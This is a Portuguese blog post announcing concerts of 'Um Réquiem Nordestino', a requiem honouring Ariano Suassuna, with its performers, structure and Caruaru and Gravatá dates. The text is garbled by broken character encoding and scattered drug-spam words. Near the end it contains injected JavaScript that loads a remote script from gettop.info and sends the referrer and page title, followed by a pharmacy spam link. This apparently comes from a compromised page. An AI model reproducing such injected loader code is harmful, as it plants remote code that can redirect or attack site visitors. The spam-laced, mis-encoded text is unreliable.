Música contemporâneaPernambucoProgramação

“Requiem nordestino” homenageia Ariano Suassuna

Obra musical conta a vida do mestre paraibano.

 

No dia 23 de outubro, a cidade de Caruaru receberA? a penA?ltima ediA�A?o do projetoA�Um RA�quiem Nordestino. A obra, idealizada por Luiz KlA�ber Queiroz e FlA?vio Medeiros, professores do Departamento de MA?sica da UFPE, e com mA?sica de Dierson Torres npxl buy Order drugs forum , jA? passou por Paudalho, NazarA� da Mata, Arcoverde e Recife.

A obra reA?ne nA?o apenas poemas do dramaturgo, romancista, ensaA�sta e poetaA�paraibano (pernambucano de coraA�A?o) falecido em 23 de julho de 2014, mas tambA�m do poeta alagoano A�ngelo Monteiro e do Livro do Apocalipse. Todos os textos musicados pelo compositor, regente e professor da UFPE, Dierson Torres.

A orquestra de 25 instrumentistas se juntarA? aoA�Contracantos, grupo vocal pernambucano criado em 2002 por FlA?vio Medeiros, alA�m dos cantores que se revezarA?o nos solos de soprano, tenor e barA�tono: VirgA�nia Cavalcanti Pills e Tarcyla Perboire (sopranos), Jadiel Gomes e Eudes Naziazeno (tenores) e Luiz Kleber Queiroz e Anderson Rodrigues (barA�tonos). Ao todo sA?o 50 mA?sicos – professores, alunos e ex-alunos do departamento de MA?sica da UFPE e convidados.

a�?Este projeto surgiu da ideia de conectar o universo da cultura popular A� mA?sica erudita, assim como mA?sicos como ClA?vis Pereira e Guerra-Peixe fizeram em parte de suas obrasa�?, comenta Luiz Kleber Queiroz. Ele conta que, para isso, propuseram a Dierson Torres a composiA�A?o de um RA�quiem com caracterA�sticas armoriais, baseado em textos do prA?prio Suassuna. Os textos foram selecionados e ordenados por FlA?vio Medeiros e pelo prA?prio Luiz Kleber e ilustram a vida de Ariano desde que saiu do SertA?o paraibano atA� seus tempos em Recife e sua concepA�A?o de morte (a�?… Sou contra a morte e nunca hei de morrera�?).

A peA�a comeA�a com uma abertura instrumental, segue com a entrada do coro, que ambienta a obra e abre espaA�o para uma narraA�A?o (ou recitativo), que ilustra o nascimento de Ariano. A seguir, entram em cena tenor, barA�tono, coro, soprano, cada um deles responsA?vel por delinear uma passagem da vida do dramaturgo (como por exemplo a morte de seu pai, a vida armorial ou o amor).

a�?A composiA�A?o A� regida tambA�m pela relaA�A?o entre elementos populares e eruditos, retirados do manancial sonoro a que Ariano passou a nomear de a�?MA?sica erudita brasileira baseada nas raA�zes popularesa�� – trabalho de pesquisa desenvolvido durante sua atuaA�A?o como professor da UFPEa�?, continua Luiz Kleber. Como exemplo, Dierson Torres se utiliza de um coco para musicar o poema Abertura sob pele de Ovelha Order . Dierson utilizou referA?ncias variadas em sua composiA�A?o. a�?Utilizei temas do folclore nordestino, assim como citaA�A�es de Britten, Shostakovich, bem como os temas dos personagens do Auto da Compadecida, de SA�rgio Campelo e Dimas SedA�ciasa�?, afirma o compositor.

Os concertos serA?o precedidos por uma pequena explanaA�A?o, apresentando ao pA?blico aspectos do Movimento Armorial, bem como narrativas da vida e obra de Ariano Suassuna. Todas contarA?o, ainda, com uma intA�rprete de libras.

 

O rA�quiem

O rA�quiem A� comumente identificado como uma obra musical composta em homenagem aos mortos, cujo texto toma como base o OfA�cio dos Mortos, em latim, da Igreja CatA?lica Romana. Registram-se em toda a HistA?ria da MA?sica Ocidental diversas composiA�A�es dessa natureza que, na mA?sica erudita, sA?o reconhecidas mundialmente como obras primas.A� O compositor Johannes Brahms (1833-1897) inovou a forma de estruturaA�A?o do rA�quiem ao utilizar o idioma nativo e um texto livre retirado das Escrituras Sagradas. Essa composiA�A?o, escrita apA?s a morte de sua mA?e, foi considerada por alguns estudiosos como uma obra-prima da literatura musical alemA?.

Motivado pela liberdade composicional de Brahms em seu RA�quiem AlemA?o,A�Um RA�quiem Nordestino online A�inova em sua concepA�A?o por nA?o apresentar textos das Escrituras Sagradas, e sim sonetos extraA�dos dos escritos do prA?prio homenageado, relativos A� sua concepA�A?o de vida e morte, a partir de sua visA?o da cultura nordestina.

Para facilitar o acesso a pessoas com deficiA?ncia, o projeto contarA? com um intA�rprete de Libras (linguagem brasileira de sinais) que a�?traduzirA?oa�? do texto falado e cantado para o pA?blico especA�fico. HaverA? tambA�m programas em braile.

 

 

SERVIA�O: Order

 

“Um RA�quiem Nordestino – Homenagem a Ariano Suassuna”

 

23 de outubro, domingo, A�s 17h

ParA?quia de SA?o JosA� – Caruaru

 

31 de outubro, segunda-feira, A�s 18h30

Igreja Matriz de Santana – GravatA?

 

EntradaA�gratuita

 

 

.var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; http://javentechnologies.com/glucophage-price-malaysia/

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.